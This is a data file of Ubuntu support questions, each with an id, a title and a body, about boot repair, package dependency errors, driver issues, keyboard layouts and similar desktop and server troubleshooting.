367657	lenovo ideapad p500 having windows 8 booting issues . boot repair pastebin included !	i recently installed ubuntu 13.10 , and thought i properly set things up to dual boot into windows 8 , but i continually get .efi errors when i attempt to boot into windows 8 . i installed boot-repair and used that to run the recommended fixes . it provided additional boot options within the grub2 , but none ( other than ubuntu ) are working . here 's the file i pulled from boot repair that shows no errors ! http : //paste.ubuntu.com/6321946/ i do appreciate any help - thank you !
367659	dropbox indicator icon dissapears right after login	even though dropbox 's app indicator dissapearing from the tray area seems like a recurrent enough problem , my issue is a litte different . when i login , i can see the app panel populating , and the dropbox icon does indeed appear ( config 'd as startup application ) , but after some other icons show up ( bluetooth , battery , etc . ) it 's gone . it 's still running though . i 'm guessing it 's having issues with staying pinned , and i do n't know how to start addressing this problem . i have tried many if not all solutions provided here in the forums for the `` icon missing '' questions . so far : i 've whitelisted everything regarding panel uninstalled-reinstalled ( with and without rebooting in between ) overwritten current installation purged installation from terminal installed from software center , from .deb file ( from dropbox website ) and from terminal ( commands listed on dropbox website ) batch deleted every `` dropbox '' ocurrences from terminal ( files and folders ) and reinstalled ran sudo apt-get install libappindicator1 , it installed , but did n't solve anything a very important fact is that it used to work , then out of nothing it stopped syncing ( a corrupted file i think ) . i reinstalled dropbox and the applet started behaving as i described above . i 'm on ubuntu 12.04 lts - 64 bits . any insight would me much appreciated !
367662	removing icons from gnome-panel in gnome-fallback session ?	unfortunately , i have to use gnome-fallback session as i have mere 1gb ram . i have added few applications on gnome-panel on top . i would like to know , how can i remove them ? i ca n't find any option .
367664	retrieving first elements of lines	i have a text file for which each line looks like : number , description1 , description2 , ... , how can i retrieve in a file the numbers only ?
367669	a linux server is showing errors when overloaded with user requests . is there any way to get notified when user limits are hit ?	a ubuntu server is showing errors when overloaded with user requests . is there any way to get notified when user limits are hit ?
367670	ubuntu 13.10 . ca n't access internet and unable to install anything	after upgrading to ubuntu 13.10 i was not able to access the internet on any program that required it . so i uninstalled firefox but i could reinstall from the software center so i used the terminal , everything ran smoothly , i told me how much additional space would be used , then it said '' err http : //us.archive.ubuntu.com /ubuntu/ saucy/main firefox i386 24.0+build1-0ubuntu1 could not resolve 'us.archive.ubuntu.com failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_24.0+build1-0ubuntu1_i386.deb could not resolve 'us.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? '' and with both given possible fixes i also get errors . please help , it 's been like this sense the day the 13.10 update was released
367673	new to world of ubuntu	i 've been running ubuntu 13.04 since june 2013 , and upgrading to 13.10 as we speak . ( note i own total 3 laptops . ) my goal is to have one complete linux machine and one dual boot , and third well ( he is a newer lenovo with windows 8.1 and is touch screen . ) but i want to learn ubuntu life and further myself with using it for everyday use , but i 'm not very fluid in linux usage and hoping to find people who have a love for teaching others how to be one with the best os in the world ! hope i 've got few people wanting to teach or give good instruction for success . ~mike cheney~
367680	hotkey to start sync or flushing memory	i 'm asking a question in a very strange manner , i 'm sorry . i know what i want , but i do n't know exactly how it 's called . i hear somewhere that ubuntu ( or linux ) has hotkeys , shortcut to start flushing memory . what i want : for example my laptop stop working , freezing , not responding . but i know that linux kernel is working , and before hot reboot i want do `` safe reboot '' that means , i want sync everything in swap and in memory with my file system before hot reboot . also i know that i can kill my x using some hotkey . i 'm using ubuntu 13.04 update according flamemyst answer thanks that was exactly what i want . just a little addition . as i read , in ubuntu some of magic commands can be disabled . this link will help how to enable commands
367682	how to install and run windows apps in ubuntu 13.10 64-bit	i have an installation cd for my cameras digital editing software for an olympus t100 and i get a message saying olympus ib can not be installed in the folder c : \program files ( x86 ) . please specify another path when i click ok the message pops up again . also when i try to update my bios using wine i get a flash plugin is not working message . does anyone know how to use wine well enough to install apps and use them ? thanks
367686	how to disable headphone detection ?	in windows there is an option to disable auto detection of headphones so speakers wo n't auto mute but i am unable to find such option in ubuntu . how can i activate such feature ?
367688	unable to mount local disk partation	i have installed ubuntu 13.10 just now my hardware configuration is intel core i3-2100,500gb and 4gb ram i have installed ubuntu in 57gb partition also 2gb of swap area i have created after installing when i tried to open my hard drive partition ( ntfs ) other than ubuntu file system it giving me error error mounting /dev/sda5 at /media/mayank/0094730a94730208 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/mayank/0094730a94730208 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . although it was working fine on the ubuntu 13.04 so how can i mount those partition ? and why i am getting this error ?
367691	how to install ubuntu 13.10 in asus k55vd preloaded windows 8 and upgraded to 8.1 with bios uefi ?	i got a asus k55vd laptop which was preloaded with windows 8 . recently , i have upgraded it to 8.1 and i decided to install ubuntu 13.10 . but the problem is i dont know how to install ubuntu into my laptop due to the uefi . i tried the easybcd but it does n't show any response for me or i made a mistake in the easybcd ? how do i install ubuntu 13.10 and dual boot with windows 8.1 ?
367695	how do i install lxc 0.9.0 on ubuntu saucy	ubuntu saucy is shipping with lxc 1.0.0 alpha , it appears to be broken with docker . how do i install 0.9.0 on it ?
367696	installation on raid set `` seeking device ''	i 'm trying to install ubuntu 13.04 ( no 13.10 because of this error ( https : //bugs.launchpad.net/ubuntu/+bug/1241589 ) ) , the installation succeeded , but with an error that he could not install bootloader ( grub ) . okay , i downloaded boot-repair and this one sad that it was successfully installed . but now , when i restart , it hangs on purple/yellow screen ( grub ) . when i click on advanced options ( after a reboot in the grub screen ) and start ubuntu ( not recovery ) , then i 'll see some errors seeking device `` /dev/dm-1 '' to ... . etc . my boot-repair summery : http : //paste.ubuntu.com/6322420/ i 've installed ubuntu before , also on the raid set , but i have n't had this error yet..
367697	samba4 not running well after reboot server	i am using ubuntu server 12.04 and samba4 to comunicate with windows client . everything is fine until i have to reboot my server . on first reboot bind9 fails to start . after remove and reinstall bind9 is sucessfully started , but ldap authentication still not working . here are the results from running testparm and smbclient : # testparm load smb config files from /usr/local/samba/etc/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ netlogon ] '' processing section `` [ sysvol ] '' processing section `` [ fileshare ] '' processing section `` [ redirect ] '' loaded services file ok. server role : role_active_directory_dc # smbclient -uadministrator -llocalhost session setup failed : nt_status_logon_failure right now client can not connect to fileshare using ldap authentication . please help .
367698	running a zenity script with if statements	i am having a problem writing a script for 'zenity . ' my intention is to have a comment selected randomly from a list and then displayed on the screen for the user to see . to be honest , i would like to have the program run its self automatically every two hours or so , but i do n't have a clue how to make that happen . i am new to bash scripting and am simply trying to teach it to myself through google searches , the bash scripting guide , and trial and error . this program will , in the end , generate a random stupid remark every couple of hours ; purely for comic relief . # ! /bin/bash # create a random number between 0 and 3 range=4 number= $ random let `` number % = $ range '' echo $ number # set random number generated above to select from list of comments . if ( $ number == 0 ) ; then comment=comment0 elif ( $ number == 1 ) ; then comment=comment1 elif ( $ number == 2 ) ; then comment=comment2 elif ( $ number == 3 ) ; then comment=comment3 echo $ comment zenity -- warning -- title= ' ! ! ! warning ! ! ! ' text= $ comment anyway , i am having a lot of trouble with the 'if ' statements . from what i have learned so far , it looks right to me ; but i get nothing but errors despite many attempted edits . i would sure like some help from anyone interested . thanks
367700	not able to open ubuntu software center and update manager	a few days back i have installed google chrome in my ubuntu but i shutdown my pc before the installation was completed . now i am getting an error e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . ' while opening them . please help me
367701	touchpad stopped working out of the blue	so , i 'm watching `` the walking dead '' and all of the sudden i lose control of my mouse through the touchpad . at first it was just for my user . i could reboot my system and switch to another user and use it just fine . i can not explain the steps i took ( i 'm using the keyboard to manuver firefox right now ) but it was something along the lines of : sudo modprobe -r psmouse & & sudo modprobe psmouse proto=imps after this command , i regained control of my mouse but the computer did n't recognize it as a touchpad . i thought if i rebooted again , it may do the trick . so after i rebooted , the mouse went completely kaput . i can not get the mouse to work at all now even though i 've tried the command several times . i 've tried different users and it 's still the same .
367705	driver for vfs5011 fingerprint reader on dell vostro 3550	i have a dell vostro 3550 laptop . fingerprint reader : validity sensors , inc. vfs5011 fingerprint reader ( usb-id : 138a:0011 ) i have searched , but i could n't get this driver for linux . i have fingerprint gui and fprint-demo software , both of which say no device found . is there any way i can install the driver and make use of the fingerprint reader ?
367707	are actions on local files sent to the smart scopes server ?	i realized this is not entirely obvious from the documentation . when i search for something in the dash , a uuid and a search phrase is sent to productsearch.ubuntu.com , providing the smart scopes service . if i then act upon one of these results , then that is reported along with the uuid . this is fine . however , what if this search results in a local file and i click to open this file . is that action too sent to the smart scopes server , or does that only apply to results that actually came from the smart scopes server ?
367714	installing ppa : phablet	i am trying to set my desktop up to put ubuntu on my phone but when i type in the command sudo apt-get install phablet-tools android-tools-adb adroid-tools-fastboot it just tells my that i have unmet dependencies phablet-tools : depends : python-lzma but it is not installabe depends : python-requests but it is not installable recommends : ubuntu-dev-tools but it is not installable
367716	understanding results of nslookup	i 'm looking at the nslookup command , and i could n't exactly understand the results it shows . a sample output nslookup ubuntu.com server : 192.168.0.1 address : 192.168.0.1 # 53 non-authoritative answer : name : ubuntu.com address : 91.189.94.156 i have two questions : 1 ) what does the hash ( address : 192.168.0.1 # 53 ) of the address mean ? 2 ) what does the non-authoritative answer mean and why the address is different from the server part ? thanks
367717	windows 7 will not boot after installing ubuntu 12.04 lts	my hp desktop will not boot windows 7 after installing ubuntu 12.04 lts . i ran boot repair and it said it was successful but still it just boots ubuntu 12.04 lts . i also updated grub as well and still the same issue . here is the boot repair address i got after trying to fix the issue : http : //paste.ubuntu.com/6322631/ .
367723	why do ubuntu notifications fade when i 'm hovering them ?	i do n't understand the logic behind this . if a notification pops up and i want it to stay a little longer , i can hover it , but the notification fades , which makes it illegible . on the other hand , when i want to close it immediately , i expect it to close when i click on it , but instead it sticks even harder . it seems like the logic is reversed here . can it be changed ?
367726	screen freezes in ubuntu 12.04 lts	after hours of searching i just could n't find a decent answer to the problem i am facing with my system , so i 'm hoping one of you guys could help me out here . i have an asus n76vm laptop with nvidia geforce 630m ( drivers installed from nvidia , version 319 ) , 8 gb ram , 2,5 ghz x4 intel i5 , with ubuntu 12.04 lts installed . every once in a while and it seems completely random to me , the screen freezes . the solution to this problem was pressing ctrl+alt+f2 after freezing , followed by ctrl+alt+f7 . now this solves the problem for me , but i am looking for a more permanent solution and i was hoping one of you guys could help me out with this . thanks in advance , nick [ edit ] ok , so after searching a lot on the web for this issue , it seemed that the amount of people reporting this issue was almost as large as the different problems causing the freezing screen issue . i tried a lot of things to make it go away and ended up with a system that did n't function how it should any more . i completely reinstalled ubuntu 12.04 lts but this time without the nvidia drivers . as expected there were no screen freezes anymore and everyone was happy . now i want my nvidia card to run sometimes when running programs that need more graphic processing power . i stumbled across bumblebee and installed everything according to https : //wiki.ubuntu.com/bumblebee after this i still received the following message when i type ¨optirun glxspheres¨ in the terminal : [ 2019.967042 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 2019.967105 ] [ error ] aborting because fallback start is disabled . for this problem there are just too many solutions , and n00by as i am , there is no way to get my head around this to solve it properly . i did install the latest kernel version as my last attempt to solve the problem . [ edit 3-11-2013 ] can someone please help me with just the nvidia/bumblebee issue ? i 'm searching the net and trying sollutions for the past 5 days now and itś starting to give me headaches .
367727	eclipse - not opening , it was working before , how to fix it and open the eclipse ide for python ?	it was working since last night , this morning stop opening , how to fix this ? sun @ sun-m14xr2 : ~/downloads/easyeclipse-python-1.3.1 $ ./eclipse ./eclipse : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory edit : http : //lists.debian.org/debian-user/2007/09/msg00364.html $ apt-file search libgtk-x11-2.0.so.0 libgtk2.0-0 : /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 libgtk2.0-0 : /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.10 libgtk2.0-0-dbg : /usr/lib/debug/usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.10 $ sudo apt-get install -- reinstall libgtk2.0-0 $ ./eclipse same ... http : //forums.freebsd.org/showthread.php ? t=7576 $ ldd ./eclipse linux-gate.so.1 = > ( 0xf7709000 ) libgtk-x11-2.0.so.0 = > not found libgdk_pixbuf-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgdk_pixbuf-2.0.so.0 ( 0xf76c2000 ) libgobject-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( 0xf7671000 ) libgdk-x11-2.0.so.0 = > not found libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf7656000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf7651000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf74a7000 ) libgmodule-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0 ( 0xf74a1000 ) libgio-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgio-2.0.so.0 ( 0xf7342000 ) libglib-2.0.so.0 = > /lib/i386-linux-gnu/libglib-2.0.so.0 ( 0xf7246000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf721a000 ) libffi.so.6 = > /usr/lib/i386-linux-gnu/libffi.so.6 ( 0xf7213000 ) /lib/ld-linux.so.2 ( 0xf770a000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xf71f9000 ) libselinux.so.1 = > /lib/i386-linux-gnu/libselinux.so.1 ( 0xf71da000 ) libresolv.so.2 = > /lib/i386-linux-gnu/libresolv.so.2 ( 0xf71c3000 ) libpcre.so.3 = > /lib/i386-linux-gnu/libpcre.so.3 ( 0xf7183000 ) librt.so.1 = > /lib/i386-linux-gnu/librt.so.1 ( 0xf717a000 ) ok not possible to solve quickly . moving to use ninja-ide
367731	error while configuring ad-hoc - ubuntu 12.04	i 'm trying to use a ad-hoc wireless network on my ubuntu 12.04 . i followed the instructions from ubuntu help . i do n't have gnome so i tried the wireless extensions cli tools method & the interface file method . in both cases i get : [ 1101.155364 ] wl12xx : error watchdog interrupt received ! starting recovery . [ 1103.166870 ] wl12xx : error command complete timeout [ 1103.177612 ] wl12xx : error could not add or replace key [ 1103.183197 ] ieee80211 phy0 : failed to set key ( 0 , ff : ff : ff : ff : ff : ff ) to hardware ( -110 ) [ 1105.198089 ] wl12xx : error command complete timeout [ 1105.205047 ] wl12xx : error failed to send stop firmware logger command [ 1107.846710 ] wl12xx : error command complete timeout [ 1107.861022 ] wl12xx : error failed to initiate cmd role enable [ 1107.869934 ] wl12xx : error watchdog interrupt received ! starting recovery . [ 1109.893402 ] wl12xx : error command complete timeout [ 1109.903167 ] wl12xx : error could not add or replace key [ 1109.915832 ] ieee80211 phy0 : failed to set key ( 0 , ff : ff : ff : ff : ff : ff ) to hardware ( -110 ) [ 1111.924652 ] wl12xx : error command complete timeout [ 1111.931030 ] wl12xx : error failed to send stop firmware logger command [ 1114.573089 ] wl12xx : error command complete timeout [ 1114.587677 ] wl12xx : error failed to initiate cmd role enable [ 1116.612182 ] wl12xx : error command complete timeout [ 1116.626617 ] wl12xx : error could not add or replace key right after the activation : sudo ip link set wlan0 up when i enter sudo iwconfig wlan0 i get : wlan0 ieee 802.11abgn essid : '' test '' mode : ad-hoc frequency:2.427 ghz cell : not-associated tx-power=20 dbm retry long limit:7 rts thrff fragment thrff encryption key:1234-5678-90 power managementn does anyone knows this problem ? how to solve it ? thank you ! aline
367733	information about file extensions	which type of file extensions are used in ubuntu ?
367734	not able to upgrade maas to 1.4 ?	i am running ubuntu 13.04 lts , and maas version runnung is maas 1.3+bzr1470+dfsg-0+1474+175~ppa0~ubuntu13.04.1 , so i 'm trying to upgrade it to mass 1.4 but its failing , sam @ xsmaas01 : ~ $ sudo apt-get install maas [ sudo ] password for sam : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : maas 1 upgraded , 0 newly installed , 0 to remove and 87 not upgraded . 2 not fully installed or removed . need to get 0 b/1,912 b of archives . after this operation , 1,024 b of additional disk space will be used . ( reading database ... 85268 files and directories currently installed . ) preparing to replace maas 1.3+bzr1470+dfsg-0+1474+175~ppa0~ubuntu13.04.1 ( using ... /maas_1.4+bzr1693+dfsg-0ubuntu2~ctools0_all.deb ) ... unpacking replacement maas ... setting up maas-cluster-controller ( 1.4+bzr1693+dfsg-0ubuntu2~ctools0 ) ... error : module version does not exist ! dpkg : error processing maas-cluster-controller ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of maas : maas depends on maas-cluster-controller ; however : package maas-cluster-controller is not configured yet . dpkg : error processing maas ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : maas-cluster-controller maas e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sam @ maas01 : ~ $ can anyone help me with this ?
367737	apt-get upgrade gives `` 403 forbidden '' error	i 'm running ubuntu 13.04 64b . sudo apt-get update works fine , but when i run sudo apt-get upgrade i get these errors : err http : //archive.ubuntu.com/ubuntu/ raring-updates/main python3.3-minimal amd64 3.3.1-1ubuntu5.2 403 forbidden err http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/ raring/main gimp amd64 2.8.6-0raring1~ppa 403 forbidden err http : //archive.ubuntu.com/ubuntu/ raring-security/main python3.3-minimal amd64 3.3.1-1ubuntu5.2 403 forbidden err http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/ raring/main gimp-help-en all 1:2.8-0raring16~ppa 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/python3.3/python3.3-minimal_3.3.1-1ubuntu5.2_amd64.deb 403 forbidden failed to fetch http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/pool/main/g/gimp/gimp_2.8.6-0raring1~ppa_amd64.deb 403 forbidden failed to fetch http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/pool/main/g/gimp-help/gimp-help-en_2.8-0raring16~ppa_all.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? running sudo apt-get upgrade -- fix-missing installs some updates , but the above errors still persist when i run apt-get upgrade again . the software update app shows the error : https : //www.dropbox.com/s/2cr450557hmahzz/software_update.jpg and selecting continue shows : https : //www.dropbox.com/s/l7u32sxyfbxxeeg/soft_upd2.jpg ( sorry for the links , i do n't have enough rep to post images ) i am behind a proxy , but apt-get update and web browsing work without issues . i also do not believe a server being down is causing this , as the problem has been there over a month . any ideas on how to fix this ?
367741	preloaded dvd with ubuntu	i currently have no means of downloading ubuntu onto a dvd disc . would it be possible for a disc with the latest ubuntu os be send to me ? thanks
367742	how to permanently delete all older kernels using the shell with confirmation question ?	to free up some disk-space you can check which kernel you are using with : uname -r and then remove all kernel versions but the current with : dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge you can run this command as a cron job , if you want this done automatically . however this is not wise , as you should always have an old kernel or two to fall back to ( just in case the new one does n't work with your system ) . at the very least , if you 've just upgraded the kernel , reboot before deleting the older versions . source : how do i remove or hide old kernel versions , to clean up the boot menu ? but this command will start uninstalling right away , without asking ! how can i change that line , so you are asked to continue before it uninstalls ?
367743	if the workspace switcher quad-screen view is active when the screensaver activates , the screensaver does n't actually take hold . why ?	on my ubuntu machine at work , if the workspace switcher quad-screen view is active when the screensaver activates , the screensaver does n't actually take hold . so a couple days later , i can sit down , select a screen , type maybe one command , and then the stupid screensaver kicks in and i have to type my password to unlock .
367745	keyboard language self switches	i 'm on 13.10 . i have an italian layout and sometimes while typing my layout self switches to soemthing different , and my modifiers ( alt gr ) do not work as expected anymore . i have to go to the inicator and choose `` it '' again . then the keyboard works again . anybody else got this issue ? any solution ?
367747	can not start my system	i have installed ubuntu studio 13.10 installed on my system . today i have rebooted it and now it is not starting or booting again , the logo is seen and there appears an error message that says : - [ 23.755113 ] systemd-udevd [ 329 ] : inotify_add_watch ( 6 , /dev/sdb , 10 ) failed . no such file or directory after this message the system does n't start . i have done a boot repair through live cd , but that also does n't helps me . here is the link of the boot repair process . please help me how to restore my system without loosing my data
367748	gpg error while downloading software : `` clearsigned file is n't valid , got 'nodata ' ''	after installing ubuntu 13.10 i try to install ubuntu-restricted-extras or any software , it shows me : e : gpg error : http : //archive.canonical.com saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication
367749	change default username that appears in the terminal	i wan na change something @ something-pcname : ~ $ to somethingelse @ somethingelse-pcname : ~ $ . i have already tried changing the user name from something to somethingelse but the terminal still displays something @ something
367751	remove 12.04 from dual boot with 13.10	when i installed 13.10 on my laptop , for some reason i decided to make it a dual boot with 12.04 lts . i do n't use the older os any more and i was wondering if i can remove 12.04 ? or do i have to do a reinstall ?
367753	how to set up manually a resolved dns record	i 'd like to manually and persistently set `` goo '' to be resolved to one of google.com server ips .
367755	how do i change mac address on ppp0	i m trying to change mac address of my ppp0 interface using macchanger . but here is the problem . macchange -- show ppp0 shows correct permanent mac address , but all zeros in current mac address . permanent : xx.xx.xx.xx.xx.xx ( my permanent mac address ) current : 00.00.00.00.00.00 ( my current mac address and i ca n't change the mac address using sudo macchanger -e ppp0 because it says the interface is up and when i disconnect internet , it say interface not found . how do i change this mac address , if its possible ? using macchanger or any .conf file
367759	cpuminer wo n't compile	i am trying to compile a cpuminer program , but get errors which i do n't know what to do about . i am compiling as said here : http : //www.return1.at/bitcoin-miner-ubuntu/ the error is : checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... no configure : error : in `/home/tomino/_software/cpuminer ' : configure : error : c compiler can not create executables see `config.log ' for more details and error in config.log : gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) configure:3320 : $ ? = 0 configure:3309 : gcc -v > & 5 gcc : error : unrecognized command line option '-v' gcc : fatal error : no input files compilation terminated . configure:3320 : $ ? = 4 configure:3309 : gcc -qversion > & 5 gcc : error : unrecognized command line option '-qversion' gcc : fatal error : no input files compilation terminated . configure:3320 : $ ? = 4 configure:3340 : checking whether the c compiler works configure:3362 : gcc -03 conftest.c > & 5 gcc : error : unrecognized command line option '-03' please help someone . thank you
367761	how to type half hindi character with hindi ( bolnagri ) layout ?	i 'm using hindi ( bolnagri ) layout to type in hindi . i 'm typing in hindi for first time . my problem is , i want to type स्वाद . how do i type that half स ? edit 1 : how to type औ with this layout ? edit 2 : how to type र्श as in आदर्श ?
367764	global menu is very sluggish in ubuntu 13.10	ever since my upgrade to 13.10 the global menu is very sluggish at times . and by this i mean that after clicking a menu it sometimes takes a while for the actual menu to show . i know there 's an issue where certain applications do n't integrate with the global menu anymore , but this seems something else . has anyone else noticed it , and maybe know a fix ?
367765	installing apps from apps directory does n't work	i installed kubuntu 13.10 64bit on my system . i tried to install lin-habu from the apps directory and i got the message that the package lin-habu could n't be found . then i tried to install other packages and sometimes i got the same message ( package not found ) . sometimes it seemed to work . what 's the matter ? what can i do to get the packages i need ?
367768	ubuntu 12.04 lts initramfs-tools dependency issue	i know this has been asked several times , but each issue and resolution seems different . i 've tried almost everything i could think of , but i ca n't fix this . i have a vm ( vmware i think ) running 12.04.03 lts which has stuck dependencies . the vm is on a rented host , running a live system so i do n't want to break it ( further ) . uname -a linux support 3.5.0-36-generic # 57~precise1-ubuntu smp thu jun 20 18:21:09 utc 2013 x86_64 x86_64 x86_64 gnu/linux some more : sudo apt-get update [ sudo ] password for tracker : reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . initramfs-tools : depends : initramfs-tools-bin ( < 0.99ubuntu13.1.1~ ) but 0.99ubuntu13.3 is installed e : unmet dependencies . try using -f. sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : initramfs-tools the following packages will be upgraded : initramfs-tools 1 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 2 not fully installed or removed . need to get 0 b/50.3 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.3 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : initramfs-tools apparmor e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i look at the policy behind initramfs-tools / bin i get : apt-cache policy initramfs-tools initramfs-tools : installed : 0.99ubuntu13.1 candidate : 0.99ubuntu13.3 version table : 0.99ubuntu13.3 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages *** 0.99ubuntu13.1 0 100 /var/lib/dpkg/status 0.99ubuntu13 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main amd64 packages apt-cache policy initramfs-tools-bin initramfs-tools-bin : installed : 0.99ubuntu13.3 candidate : 0.99ubuntu13.3 version table : *** 0.99ubuntu13.3 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 0.99ubuntu13 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main amd64 packages so the issue seems to be i have 0.99ubuntu13.3 for initramfs-tools-bin yet 0.99ubuntu13.1 for initramfs-tools , and ca n't upgrade to 0.99ubuntu13.3 . i 've performed apt-get clean/autoclean/install -f/upgrade -f many times but they wo n't resolve . i can think of only 2 other 'solutions ' : edit the dpkg dependency list to trick it into doing the installation with a broken dependency . this seems very dodgy and it would be a last resort downgrade both initramfs-tools and initramfs-tools-bin to 0.99ubuntu13 from the precise/main sources and hope that would get them in step . however i 'm not sure if this will be possible , or whether it would introduce more issues . i 'm not sure how this situation arise in the first place . /boot was 96 % full ; it 's now 56 % full ( it 's tiny - 64mb ... this is what i got from the hosting company ) . can anyone offer advice please ?
367772	udev : how to match symlink during remove event ?	i am using libusb to contact with a printer . and i am writing a rule for udev to remove the printer when it is disconnected . i use symlink to indicate the device . but when removing , the rule is not triggered . what should i do ? attrs { manufacturer } == '' zebra technologies '' , action== '' add '' , run+= '' /usr/local/bin/reinitzebra.sh '' , symlink+= '' usblp % k '' symlink== '' usblp % k '' , action== '' remove '' , run+= '' /usr/local/bin/reinitzebra.sh ''
367777	keyboad layout : in 13.10 , modified symbols do not apply	i like to tweak my colemak layout a bit , so i changed /usr/share/x11/xkb/symbols/us to contain my changes . sure , they get lost on an upgrade , but that is not very often . after upgrading to 13.10 , this does not work anymore . i changed the file , but the changes are not applied . neither when i use the settings program , nor when i issue setxkbmap 'us ( colemak ) ' directly . where is this data stored now , is there some kind of cache ?
367778	juju bootstrap fails for windows azure	i am trying to play with juju on windows azure . i did the configuration part , however the bootstrap fails on a network configuration error : 2013-10-29 10:08:49 error juju supercommand.go:282 put request failed : badrequest - xml schema validation error in network configuration at line 75,18 . ( http code 400 : bad request ) how can i troubleshoot ? can i find somewhere the xml file to examine it ? thanks ! thomas .
367779	settings to not suspend on lid close do nothing	still when i close the lid the laptop suspends . how do i stop ubuntu from suspending , at all , ever ? it would n't be so annoying if it were possible to wake from a suspend .
367780	13.10 install not picking up hard drive	trying to install ubuntu 13.10 on dell inspiration laptop but it is n't picking up the hard drive during the install process . if i try rather than install and open gparted it picks up the hard drive fine . then while in try i run install it still does not pick up the hard drive . it is a sata 500gb hard drive . any help on this would be great .
367782	extend gnome-control-center’s list of keyboard layouts	while looking for my problem of keyboad layout : in 13.10 , modified symbols do not apply , i noticed that gnome-control-center region layouts has a list of keyboard layouts that is not directly related to the ones found in /usr/share/x11/xkb/symbols . for example , on my german machine it lists ‘englisch ( colemak ) ’ and ‘english ( britisch , colemak ) ’ as keyboard layouts , both are not found in the original files , but obviously translations . so , my question is : where does gnome-control-center get its list of keyboard layouts from ? can it be extended ?
